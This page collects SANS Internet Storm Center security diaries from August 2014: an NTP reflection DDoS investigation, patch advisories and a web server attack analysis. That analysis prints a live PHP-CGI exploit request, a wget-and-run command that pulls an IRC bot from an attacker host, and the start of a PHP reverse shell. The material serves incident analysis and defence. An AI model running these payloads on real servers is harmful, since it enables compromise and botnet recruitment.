Latest Alerts

Syndicate content SANS Internet Storm Center, InfoCON: green
Updated: 3 days 15 hours ago

Social Engineering Alive and Well, (Wed, Aug 20th)

Wed, 08/20/2014 - 06:11

The muse for this diary is far from hot off the press. Many of you may have already come across the click through scam on Facebook reporting a video recording taken of Robin Williams moments before his death.  

In case you had not heard, Robin Williams is a popular American movie actor and entertainer that recently took his own life at the young age of 63.  The general public's open expression of grief for his passing has given some evil doers an opening to take advantage of human emotion.

Snopes.com has a write up on this scam. [1]   I can offer a couple of details on it.    
An image like this one will show up in your Facebook feed enticing you to click to view the video of Robin Williams.



Once the link is clicked, it will bait again the user to fill out a survey and provide some information. (PII)
The following image is the next step.


 

By clicking through this type of scam it opens a list of vectors for the user to be exploited. So please beware, educate your family, friends, and co-workers.

Let this also be a wake up call for other soft spots.  The ALS Ice Bucket challenge is viral marketing success, that could easily be exploited. So don't always trust and feel the need to meet your curiosity.

Safe clicking.

 
[1] http://www.snopes.com/computer/facebook/robinwilliams.asp

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, August 20th 2014 http://isc.sans.edu/podcastdetail.html?id=4113, (Wed, Aug 20th)

Tue, 08/19/2014 - 18:44
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Tuesday, August 19th 2014 http://isc.sans.edu/podcastdetail.html?id=4111, (Tue, Aug 19th)

Mon, 08/18/2014 - 19:38
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Part 2: Is your home network unwittingly contributing to NTP DDOS attacks?, (Sun, Aug 17th)

Mon, 08/18/2014 - 17:32

This diary follows from Part 1, published on Sunday August 17, 2014.  

How is it possible that with no port forwarding enabled through the firewall that Internet originated NTP requests were getting past the firewall to the misconfigured NTP server?

The reason why these packets are passing the firewall is because the manufacturer of the gateway router, in this case Pace, implemented full-cone NAT as an alternative to UPnP.

What is full-cone NAT?

The secret is in these settings in the gateway router:

If strict UDP Session Control were enabled the firewall would treat outbound UDP transactions as I described earlier.  When a device on your network initiates an outbound connection to a server responses from that server are permitted back into your network.  Since UDP is stateless most firewalls simulate state with a timeout.  In other words if no traffic is seen between the device and the server for 600 seconds then don’t permit any response from the server until there is new outbound traffic. But anytime related traffic is seen on the correct port the timer is reset to 600 seconds, thus making it possible for this communication to be able to continue virtually forever as long as one or both devices continue to communicate. Visually that looks like:

However if UDP Session Control is disabled, as it is in this device, then this device implements full-cone NAT (RFC 3489). Full-cone NAT allows any external host to use the inbound window opened by the outbound traffic until the timer expires.  

Remember anytime traffic is seen on the correct port the timer is reset to 600 seconds, thus making it possible for this communication to be able to continue virtually forever as long as one or both devices continue to communicate.

The really quick among you will have realized that this is not normally a big problem since the only port exposed is the original ephemeral source port and it is waiting for a NTP reply.  It is not likely to be used as an NTP reflector.  But the design of the NTP protocol can contribute to this problem.

Symmetric Mode NTP

There is a mode of NTP called symmetric NTP in which, instead of the originating device picking an ephemeral port for the outbound connection,  both the source and the destination ports use 123. The traffic flow would look like:

Symmetric NTP opens up the misconfigured server to be an NTP reflector.  Assuming there is an NTP server running on the originating machine on UDP port 123, if an attacker can find this open NTP port before the timeout window closes they can send in NTP queries which will pass the firewall and will be answered by the NTP server.  If the source IP address is spoofed the replies will not go back to the attacker, but will go to a victim instead. 

Of course UDP is stateless so the source IP can be spoofed and there is no way for the receiver of the NTP request to validate the source IP or source port permitting the attacker to direct the attack against any IP and port on the Internet.  It is exceedingly difficult to trace these attacks back to the source so the misconfigured server behind the full-cone NAT will get the blame. As long as the attacker sends at least one packet every 600 seconds he can hold the session open virtually forever and use this device to wreak havoc on unsuspecting victims. We have seen indications of the attackers holding holding these communications open for months.  

What are the lessons to be learned here:

  • If all ISPs fully implemented anti-spoofing filters then the likelihood of this sort of attack is lowered substantially.  In a nutshell anti-spoofing says that if the traffic is headed into my network and the source IP address is from my network then the source IP must be spoofed, so drop the packet.  It also works in the converse.  If a packet is leaving my network and the source IP address is not an IP address from my network then the source IP address must be spoofed, so drop the packet.
  • It can't hurt to check your network for NTP servers.  A single nmap command will quickly confirm if any are open on your network. nmap -sU  -A -n -PN -pU:123 --script=ntp-monlist .  If you find one or more perhaps you can contact the vendor for possible resolution.
  • If you own a gateway router that implements full-cone NAT you may want to see if your gateway router implements the equivalent of  the Pace “Strict UDP Session Control”.  This will prevent an attacker from access misconfigured UDP servers on your network. 

-- Rick Wanner - rwanner at isc dot sans dot edu- http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Web Server Attack Investigation - Installing a Bot and Reverse Shell via a PHP Vulnerability, (Sat, Aug 16th)

Mon, 08/18/2014 - 06:59

With Windows malware getting so much attention nowadays, it's easy to forget that attackers also target other OS platforms. Let's take a look at a recent attempt to install an IRC bot written in Perl by exploiting a vulnerability in PHP.

The Initial Probe

The web server received the initial probe from 46.41.128.231, an IP address that at the time was not flagged as malicious on various blacklists:

HEAD / HTTP/1.0

The connection lacked the headers typically present in an HTTP request, which is why the web server's firewall blocked it with the 403 Forbidden HTTP status code error. However, that response was sufficient for the attacker's tool to confirm that it located a web server.

The Exploitation Attempt

The offending IP address initiated another connection to the web server approximately 4 hours later. This time, the request was less gentle than the initial probe:

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Content-Type: application/x-www-form-urlencoded

As shown above, the attacking system attempted to access /cgi-bin/php on the targeted server. The parameter supplied to /cgi-bin/php, when converted from hexadecimal into ASCII, corresponded to this:

-dallow_url_include=on-dsafe_mode=off-dsuhosin.simulation=on-ddisable_functions=""-dopen_basedir=none-dauto_prepend_file=php://input-dcgi.force_redirect=0-dcgi.redirect_status_env=0-n

These parameters, when supplied to a vulnerable version of /cgi-bin/php, are designed to dramatically reduce security of the PHP configuration on the system. We covered a similar pattern in our 2012 diary when describing the CVE-2012-1823 vulnerability in PHP. The fix to that vulnerability was poorly implemented, which resulted in the CVE-2012-2311 vulnerability that affected "PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script," according to MITRE. The ISS advisory noted that,

"PHP could allow a remote attacker to execute arbitrary code on the system, due to an incomplete fix for an error related to parsing PHP CGI configurations. An attacker could exploit this vulnerability to execute arbitrary code on the system."

SpiderLabs documented a similar exploitation attempt in 2013, where they clarified that "one of the key modifications is to specify 'auto_prepend_file=php://input' which will allow the attacker to send PHP code in the request body."

The Exploit's Primary Payload: Downloading a Bot

With the expectation that the initial part of the malicious POST request reconfigured PHP, the body of the request began with the following code:

php system("wget ip-address-redacted/speedtest/.a/hb/phpR05 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7;rm -rf /tmp/.bash_h1s7 &"); ?>

If the exploit was successful, code would direct the targeted server to download /.a/hb/phpR05 from the attacker's server, saving the file as /tmp/.bash_h1s7, then running the file using Perl and then deleting the file. Searching the web for "phpR05" showed a file with this name being used in various exploitation attempts. One such example was very similar to the incident being described in this diary. (In a strange coincidence, that PHP attack was visible in the data that the server was leaking due to a Heartbleed vulnerability!)

The malicious Perl script was an IRC bot, and was recognized as such by several antivirus tools according to VirusTotal. Here's a tiny excerpt from its code:

#####################
# Stealth Shellbot  #
#####################

sub getnick {
  return "Rizee|RYN|05|".int(rand(8999)+1000);
}

This bot was very similar to the one described by James Espinosa in 2013 in an article discussing Perl/ShellBot.B trojan activity, which began with attempts to exploit a phpMyAdmin file inclusion vulnerability.

The Exploit's Secondary Payload: Reverse Shell

In addition to supplying instructions to download the IRC bot, the malicious POST request contained PHP code that implemented a reverse backdoor, directing the targeted web server to establish a connection to the attacker's server on TCP port 22. That script began like this:

$ip = 'ip-address-redacted';
$port = 22;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';

Though the attacker specified port 22, the reverse shell didn't use SSH. Instead, it expected the attacker's server to listen on that port using a simple tool such as Netcat. Experimenting with this script and Netcat in a lab environment confirmed this, as shown in the following screenshot:

In this laboratory experiment, 'nc -l -p 22' directed Netcat to listen for connections on TCP port 22. Once the reverse shell script ran on the system that mimicked the compromised server, the simulated attacker had the ability to run commands on that server (e.g., 'whoami').

Interestingly, the production server's logs showed that the system in the wild was listening on TCP port 22; however, it was actually running SSH there, so the reverse shell connection established by the malicious PHP script would have failed.

A bit of web searching revealed a script called ap-unlock-v1337.py, reportedly written in 2012 by "noptrix," which was designed to exploit the PHP vulnerability outlined above. That script included the exact exploit code used in this incident and included the code that implemented the PHP-based reverse shell. The attacker probably used that script with the goal of installing the Perl-based IRC bot, ignoring the reverse shell feature of the exploit.

Wrap Up

The attack, probably implemented using automated script that probed random IP addresses, was designed to build an IRC-based bot network. It targeted Unix systems that ran a version of PHP susceptible to a 2-year-old vulnerability. This recent incident suggests that there are still plenty of unpatched systems left to compromise. The attacker used an off-the-shelf exploit and an unrelated off-the-shelf bot, both of which were readily available on the Internet. The attacker's infrastructure included 3 different IP addresses, none of which were blacklisted at the time of the incident.

-- Lenny Zeltser

Lenny Zeltser focuses on safeguarding customers' IT operations at NCR Corp. He also teaches how to analyze malware at SANS Institute. Lenny is active on Twitter and . He also writes a security blog, where he recently described other attacks observed on a web server.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Monday, August 18th 2014 http://isc.sans.edu/podcastdetail.html?id=4109, (Mon, Aug 18th)

Sun, 08/17/2014 - 20:39
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Part 1: Is your home network unwittingly contributing to NTP DDOS attacks?, (Sun, Aug 17th)

Sun, 08/17/2014 - 09:37

For the last year or so, I have been investigating UDP DDOS attacks. In this diary I would like to spotlight a somewhat surprising scenario where a manufacturer’s misconfiguration on a popular consumer device combined with a design decision in a home gateway router may make you an unwitting accomplice in amplified NTP reflection DDOS attacks.

This is part 1 of the story.  I will publish the conclusion Tuesday August 19th.

Background

Today almost every house has consumer broadband services.  Typical broadband installations will have a device, usually provided by your service provider, which acts as a modem, a router and a firewall (for the rest of the diary this device will be called a gateway router).   In a nutshell the firewall in the gateway router permits network traffic initiated on your network out to the Internet, and permits responses to that traffic back into your network.  Most importantly the firewall will block all traffic destined for your network which is not a response to traffic initiated from your network.  This level of firewall capability meets the requirements of almost all broadband consumers on the Internet today.   

For those of us power users who required more capability, gateway router manufacturers tended to support a port forwarding feature that would allow us to accommodate servers and other devices behind the firewall.  This was great for us tech-savvy folk, but typically port forwarding was beyond the understanding of the average Internet user like my Dad (sorry Dad!) or my Grandma.

In the last few years consumer devices that plug into your home network and use more complicated networking, that does not fit the standard initiate-respond model, have become more common.  The most common of those is gaming consoles, but other devices like home automation, storage devices and others can also be an issue.  As stated above setting up port forwarding so these devices will function properly is beyond the average Internet users’ capability.  Luckily the gateway router vendors have thought of that as well. 

To simplify connecting these devices, gateway router vendors tend to implement one of two ways of supporting these devices.  Most support Universal Plug and Play (UPnP) with a minority of  vendors supporting Full-cone NAT.  

Investigation

It begins with a complaint from a reputable source that a customer is participating in a reflective NTP DDOS attack utilizing monlist for amplification.

The complaint is against XXX.160.28.174, a dynamic address broadband customer.  The analyst’s first thought is that this is a tech-savvy user has setup a NTP server and added port forwarding to their router.  It should be easy to resolve. Contact the customer and tell him to patch his NTP server to the current version and everything will be great!  Unfortunately, this is where things go sideways.

While network monitoring clearly shows this customer’s connection participating in a NTP DDOS attack:

Review of the firewall configuration showed that there are no ports forwarded on the firewall.

But the NAT logs in the firewall show a large number of outbound connections to various addresses originating from this device and most of them don’t appear to be to NTP servers. 

172.16.1.64:123, f: 192.75.12.11:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 199.182.221.110:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 142.137.247.109:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 129.128.5.211:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 206.108.0.132:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 94.185.82.194:443, n: XXX.160.28.174:123
172.16.1.64:123, f: 60.226.113.100:80, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:24572, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:38553, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:24572, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:47782, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:53177, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:43397, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:15673, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:17275, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:63467, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:56970, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:64682, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:26332, n: XXX.160.28.174:123
172.16.1.64:123, f: 101.166.182.210:80, n: XXX.160.28.174:123

According to the NAT table, the address behind the gateway router that is initiating the outbound UDP sessions is at 172.16.1.64. The device table shows it as:

Name: home-controller-300-000FFF13C150
Hardware Address: 00:0f:ff:13:c1:50

That MAC address is owned by a company called Control4 who makes popular home automation devices. It is clear that the Control4 device has a configuration problem.  There is likely no reason for Control4 to be running an NTP server on a home automation device, and certainly that NTP server should not support the monlist command. Most likely this a result of the Linux/Unix difficulty that when you implement an NTP client on a *nix platform you almost always wind up with an NTP server getting enabled as well which you need to manually disable. Either way, I was in contact with Control4, and they were aware of the issue and have released a patch and any Control4 devices that call home to the mothership should be resolved.  Unfortunately they have a significant number of devices that, for some reason, don't call home and can't be patched until they do.  But this is not just a Control4 problem.  In the course of my investigation I found Macintosh computers, FreeNAS devices, Dell Servers and Dlink Storage devices displaying the same behavior. But even if there is a misconfigured NTP server on these networks, if the firewall is working properly, then no uninitiated connections should be permitted into these, and these devices should not be capable of being used as a reflector.

An nmap scan shows that not only is it possible to connect through the firewall, but that there is clearly an NTP server answering queries and that permits the monlist command, maximizing the amplification.

123/udp open          ntp     NTP v4

| ntp-monlist: 

|   Target is synchronised with 206.108.0.133

|   Alternative Target Interfaces:

|       172.16.1.64     

|   Public Servers (4)

|       142.137.247.109 174.142.10.100  198.27.76.239   206.108.0.133   

|   Other Associations (166)

|       24.220.174.96 seen 7615 times. last tx was unicast v2 mode 7

|       193.25.121.1 seen 2084 times. last tx was unicast v2 mode 7

|       66.26.0.192 seen 406 times. last tx was unicast v2 mode 7

|       109.200.131.2 seen 11079 times. last tx was unicast v2 mode 7

|       79.88.149.109 seen 15356 times. last tx was unicast v2 mode 7

|       66.176.8.42 seen 90397 times. last tx was unicast v2 mode 7

|       84.227.75.171 seen 58970 times. last tx was unicast v2 mode 7

|       82.35.229.219 seen 952 times. last tx was unicast v2 mode 7

|       96.20.156.186 seen 2123 times. last tx was unicast v2 mode 7

|       216.188.239.159 seen 178 times. last tx was unicast v2 mode 7

|       184.171.166.72 seen 923 times. last tx was unicast v2 mode 7

|       94.23.230.186 seen 96 times. last tx was unicast v2 mode 7

… total of 166 entries

 

This is where I will end the story for now. What do you think is happening?  Conclusion Tuesday August 19th.

-- Rick Wanner - rwanner at isc dot sans dot edu- http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Issues with Microsoft Updates, (Sat, Aug 16th)

Sat, 08/16/2014 - 07:16

Microsoft has updated some bulletins because there are three known issues that can affect your computer.

  • when KB2982791 is installed, fonts that are installed in a location other than the default fonts directory (%windir%\fonts\) cannot be changed when they are loaded into any active session
  • Fonts do not render correctly after any of the following updates are installed:
    • 2982791 MS14-045: Description of the security update for kernel-mode drivers: August 12, 2014
    • 2970228 Update to support the new currency symbol for the Russian ruble in Windows
    • 2975719 August 2014 update rollup for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2
    • 2975331 August 2014 update rollup for Windows RT, Windows 8, and Windows Server 2012
  • Microsoft is investigating behavior in which systems may crash with a 0x50 Stop error message (bugcheck) after any of the following updates are installed:
    • 2982791 MS14-045: Description of the security update for kernel-mode drivers: August 12, 2014
    • 2970228 Update to support the new currency symbol for the Russian ruble in Windows
    • 2975719 August 2014 update rollup for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2
    • 2975331 August 2014 update rollup for Windows RT, Windows 8, and Windows Server 2012

If you have not installed yet those updates, please don't install it until Microsoft pubish a fix. If you already installed it, please check each article for mitigation measures.

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

AppLocker Event Logs with OSSEC 2.8, (Fri, Aug 15th)

Fri, 08/15/2014 - 08:06

In a previous post, Monitoring Windows Networks Using Syslog, I discussed using syslog to send the event logs to a SIEM. This post covers another technique for collecting event log data for analysis.

A new version of OSSEC (2.8) has been released that includes the ability on Windows to access event channels that were introduced in Vista. To get this  to work correctly, I had to have the agent and server on 2.8. This new ability allows admins to send some of the more interesting event logs to OSSEC in a very easy way.

Client Config

Setting up the config for the subscription is quite easy.  If you want to do it on an per install basis, you edit the C:\Program Files\ossec-agent\ossec.conf.  Add a new tag for local file, then under location put the XPATH channel name and the log_format as eventchannel.

 

​

 

If you want this config to be pushed out to all your Windows OS centrally, you should add the config below to the /var/ossec/etc/shared/agent.conf. This file has a added XML field for matching which system should apply the config.


 

 

Creating Rules

Once you get the logs, you need to create rules to get the alerts.  When creating the rules, you need to know what event level (e.g. Info, Error ect..) the alerts are created for the event.  To get a detailed list of the events, follow this link (hxxp://technet.microsoft.com/en-us/library/ee844150(v=ws.10).aspx)

 

When creating your own rules, you should always add them to the Local_rules.xml file to make sure they do not get overwritten with updates.  These rules should start with 100000 rule ID.

 

 

 

I’ve posted all my AppLocker rules to my github(hxxps://github.com/tcw3bb/ISC_Posts/blob/master/OSSEC_AppLocker_Local_Rule.xml), and I’ve also submitted them to the OSSEC group to be added in the next version.  When using the local rules, you may need to change rule ID for your environment.  

RAW Log

Once you have the rules in place your alerts like the ones below should be created.

Quick report

To get a report for the current day of who had blocked apps, you can run the following:

>zcat /var/ossec/log/alerts/alerts.log |/var/ossec/bin/ossec-reportd -f rule 100021 -s

 

I also have a nxlog and an eventsys client config on my github (hxxps://github.com/tcw3bb/ISC_Posts)for additional client config.  To use these with OSSEC, you will need to have a different parser and rules.  

--

Tom Webb

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Friday, August 15th 2014 http://isc.sans.edu/podcastdetail.html?id=4107, (Fri, Aug 15th)

Thu, 08/14/2014 - 18:17
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

PHP 5.3.29 is available, PHP 5.3 reaching end of life, (Thu, Aug 14th)

Thu, 08/14/2014 - 08:15

The PHP development team announces the immediate availability of PHP 5.3.29. This release marks the end of life of the PHP 5.3 series. Future releases of this series are not planned. All PHP 5.3 users are encouraged to upgrade to the current stable version of PHP 5.5 or previous stable version of PHP 5.4, which are supported till at least 2016 and 2015 respectively.

PHP 5.3.29 contains about 25 potentially security related fixes backported from PHP 5.4 and 5.5.

For source downloads of PHP 5.3.29, please visit our downloads page. Windows binaries can be found on windows.php.net/download/. The list of changes is recorded in the ChangeLog.

For helping your migration to newer versions please refer to our migration guides for updates from PHP 5.3 to 5.4 and from PHP 5.4 to 5.5.

http://php.net/

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Threats to virtual environments, (Thu, Aug 14th)

Thu, 08/14/2014 - 04:10

In the past few years the virtualization concept becomes very popular. A new study by Symantec [1] discussed the threats to the virtual environment and suggests the best practice to minimize the risk.

The study show the new security challenges with the virtual environment, threats such as that the network traffic may not be monitored by services such as IDS or DLP.    

The paper covers how malware behave in virtual environment . One example of malware that target virtual machines is W32.Crisis .This malware doesn’t exploit any specific vulnerability , basically it take the advantage of how the virtual machines are stored in the host system. Virtual machine is stored as a set of files on the storage and it can be manipulated or mounted by free tools.

The study address using VMs as a system for malicious code analysis, for example in some cases when a malicious code detects that’s its running in a virtual machine it will send a false data such as trying to connect to C&C with wrong IP.  The study show that the number of malware that detect Vmware has been increased in the past couple years. For more reliable results the study suggests that security researcher should use physical hardware in controlled network instead of virtual machines.  

In the last section of the paper it suggest the best practice to secure the virtual environment.

1 http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/threats_to_virtual_environments.pdf

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Thursday, August 14th 2014 http://isc.sans.edu/podcastdetail.html?id=4105, (Thu, Aug 14th)

Wed, 08/13/2014 - 17:39
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Updates for Apple Safari, (Wed, Aug 13th)

Wed, 08/13/2014 - 15:46

Apple today released updates for Safari 6.x and 7.x . The patches fix 7 vulnerabilities and are available for versions of OS X back to 10.7.5 (Lion). [1]

The bulletin released by Apple is very vague and only talks about "memory corruption issues" but states that some of these vulnerabilities may lead to arbitrary code execution. The vulnerabilities affect WebKit, Apple's browser library, and may affect other products as well.

With this update, the latest versions of Safari are 6.1.6 and 7.0.6.

[1] http://support.apple.com/kb/HT6367

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Something is amiss with the Interwebs! BGP is a flapping. , (Tue, Aug 12th)

Wed, 08/13/2014 - 05:28

[Update] See http://www.bgpmon.net/what-caused-todays-internet-hiccup/ for a good summary of what happened.

 

Tuesday Morning, various networks experienced outages from 4-6am EDT (8-10am UTC) [1]. I appears the outage was the result of a somewhat anticipated problem with older routers and their inability to deal with the ever increasing size of the Internet's routing table.

These BGP routers need to store a map of the internet defining which IP address range belongs to which network. Due to the increasing scarcity of IPv4 space, registrars and ISPs assign smaller and smaller netblocks to customers, leading to a more and more fragmented topology. Many older routers are limited to store 512k entries, and the Internet's routing table has become large enough to reach this limit. Tuesday morning, it appears to have exceeded this limit for a short time [2][3].

The large number of route announcements, and immediate removals shown in [2] could indicate a malicious intend behind this events (or a simple configuration error), but either way likely point to one entity "pushing" the size of the routing table beyond the 512k limit briefly. At around this time, one larger ISP (Windstream, AS7029) recovered from an unrelated outage and routing changes due to the recovery are one suspect that may have triggered the event.

Vendors published guidance for users of older routers how to avoid this issue [5]. This guidance has been available for a while. Please contact your vendor if you are affected. You may also want to consider upgrading your router. The routing table is likely going to get larger over the next few years until networks rely less on IPv4 and take advantage of IPv6.

 

[1] https://puck.nether.net/pipermail/outages/2014-August/007090.html
[2] http://www.cymru.com/BGP/prefix_delta.html (see the spike in deltas around that time)
[3] http://www.cidr-report.org/2.0/#General_Status  (note how close it is to 512k and rising)
[4] http://www.thewhir.com/web-hosting-news/liquidweb-among-companies-affected-major-outage-across-us-network-providers
[5] http://www.cisco.com/c/en/us/support/docs/switches/catalyst-6500-series-switches/117712-problemsolution-cat6500-00.html
 

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.
My SANS Teaching Schedule

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, August 13th 2014 http://isc.sans.edu/podcastdetail.html?id=4103, (Wed, Aug 13th)

Tue, 08/12/2014 - 18:25
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Microsoft Patch Tuesday - August 2014, (Tue, Aug 12th)

Tue, 08/12/2014 - 18:07

Overview of the August 2014 Microsoft patches and their status.

# Affected Contra Indications - KB Known Exploits Microsoft rating(**) ISC rating(*) clients servers MS14-043 Vulnerability in Windows Media Center Could Allow Remote Code Execution Microsoft Windows

CVE-2014-4060 KB 2978742 No Severity:Critical
Exploitability: 1 Critical Important MS14-044 Vulnerabilities in SQL Server Could Allow Elevation of Privilege Microsoft SQL Server

CVE-2014-1820
CVE-2014-4061 KB 2984340 No Severity:Important
Exploitability: 1 Important Important MS14-045 Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege Microsoft Windows

CVE-2014-0318
CVE-2014-1819
CVE-2014-4064 KB 2984615 No Severity:Important
Exploitability: 1 Important Important MS14-046 Vulnerability in .NET Framework Could Allow Security Feature Bypass Microsoft Windows,Microsoft .NET Framework

CVE-2014-4062 KB 2984625 No Severity:Important
Exploitability: 1 Important Important MS14-047 Vulnerability in LRPC Could Allow Security Feature Bypass Microsoft Windows

CVE-2014-0316 KB 2978668 No Severity:Important
Exploitability: 1 Important Important MS14-048 Vulnerability in OneNote Could Allow Remote Code Execution Microsoft Office

CVE-2014-2815 KB 2977201 No Severity:Important
Exploitability: 1 Critical Important MS14-049 Vulnerability in Windows Installer Service Could Allow Elevation of Privilege Microsoft Windows

CVE-2014-1814 KB 2962490 No Severity:Important
Exploitability: 1 Important Important MS14-050 Vulnerability in Microsoft SharePoint Server Could Allow Elevation of Privilege Microsoft Server Software

CVE-2014-2816 KB 2977202 No Severity:Important
Exploitability: 1 Important Important MS14-051 Cumulative Security Update for Internet Explorer Microsoft Windows, Internet Explorer

CVE-2014-2774 CVE-2014-2784 CVE-2014-2796 CVE-2014-2808 CVE-2014-2810 CVE-2014-2811 CVE-2014-2817 CVE-2014-2818 CVE-2014-2819 CVE-2014-2820 CVE-2014-2821 CVE-2014-2822 CVE-2014-2823 CVE-2014-2824 CVE-2014-2825 CVE-2014-2826 CVE-2014-2827 CVE-2014-4050 CVE-2014-4051 CVE-2014-4052 CVE-2014-4055 CVE-2014-4056 CVE-2014-4057 CVE-2014-4058 CVE-2014-4063 CVE-2014-4067 CVE-2014-2774 CVE-2014-2784 CVE-2014-2796 CVE-2014-2808 CVE-2014-2810 CVE-2014-2811 CVE-2014-2817 CVE-2014-2818 CVE-2014-2819 CVE-2014-2820 CVE-2014-2821 CVE-2014-2822 CVE-2014-2823 CVE-2014-2824 CVE-2014-2825 CVE-2014-2826 CVE-2014-2827 CVE-2014-4050 CVE-2014-4051 CVE-2014-4052 CVE-2014-4055 CVE-2014-4056 CVE-2014-4057 CVE-2014-4058 CVE-2014-4063 CVE-2014-4067 KB 2976627 Yes! Severity:Critical
Exploitability: 1 Critical Important We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY (*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
    • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threatatches.

--
Alex Stanford - GIAC GWEB & GIAC GSEC
Research Operations Manager,
SANS Internet Storm Center

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Adobe updates for 2014/08, (Tue, Aug 12th)

Tue, 08/12/2014 - 09:49

Adobe has released security updates for Adobe Flash Player, Adobe AIR, Adobe Reader, and Acrobat. The updates are rated as critical and an impressive number of CVE entries.  CVE-2014-0538, CVE-2014-0540, CVE-2014-0541, CVE-2014-0542, CVE-2014-0543, CVE-2014-0544, CVE-2014-0545, CVE-2014-0546. Summary: update now. 

http://helpx.adobe.com/security/products/flash-player/apsb14-18.html
http://helpx.adobe.com/security/products/reader/apsb14-19.html

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.
My SANS Teaching Schedule

 

 

